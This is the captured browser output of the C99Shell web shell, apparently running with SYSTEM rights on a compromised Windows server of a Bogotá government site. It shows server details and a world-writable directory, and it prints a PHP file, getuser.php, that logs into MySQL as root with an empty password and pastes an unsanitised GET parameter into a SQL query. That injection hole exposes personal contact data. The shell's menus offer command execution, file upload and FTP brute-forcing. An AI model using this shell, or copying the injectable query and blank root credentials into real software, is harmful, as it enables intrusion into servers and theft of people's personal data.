!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\ambientebogota.gov.co\actores\Secretariaambiente\   drwxrwxrwx
Free 3.24 GB of 39.52 GB (8.2%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     getuser.php (905 B)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$q
=$_GET["q"];

$con mysql_connect('localhost''root''');
if (!
$con)
{
die(
'No Conectado : ' mysql_error());
}

mysql_select_db("aplicacionregistro"$con);

$sql="SELECT r.identi,r.user,r.direccion,r.telefono,r.email,r.web FROM reg_organizaciones as r inner join authorize as a on r.id=a.id WHERE r.web = '".$q."'";

$result mysql_query($sql);

echo 
"<table border='1'>
<tr>
<th>Identificacion</th>
<th>Usuario</th>
<th>Direccion</th>
<th>Telefono</th>
<th>Email</th>
<th>Comit&eacute;</th>
</tr>"
;

while(
$row mysql_fetch_array($result))
{
echo 
"<tr>";
echo 
"<td>" $row['identi'] . "</td>";
echo 
"<td>" $row['user'] . "</td>";
echo 
"<td>" $row['direccion'] . "</td>";
echo 
"<td>" $row['telefono'] . "</td>";
echo 
"<td>" $row['email'] . "</td>";
echo 
"<td>" $row['web'] . "</td>";
echo 
"</tr>";
}
echo 
"</table>";

mysql_close($con);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--